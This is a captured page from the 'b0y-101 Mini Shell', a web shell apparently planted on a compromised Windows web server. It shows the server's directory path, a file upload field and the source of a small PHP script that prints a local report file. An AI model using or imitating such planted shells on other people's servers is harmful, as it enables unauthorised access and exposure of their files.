b0y-101 Mini Shell


Current Path : E:/www/b-group.old/spfin - Copy/
File Upload :
Current File : E:/www/b-group.old/spfin - Copy/open.php

<?php
header('Access-Control-Allow-Origin: https://fis.ru.ac.th');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');

$myfile = fopen("./QRTRAN/report/BPQR_210910.txt", "r") or die("Unable to open file!");
// Output one line until end-of-file
while(!feof($myfile)) {
  echo fgets($myfile) . "<br>";
}
fclose($myfile);
?>

Copyright © 2019 by b0y-101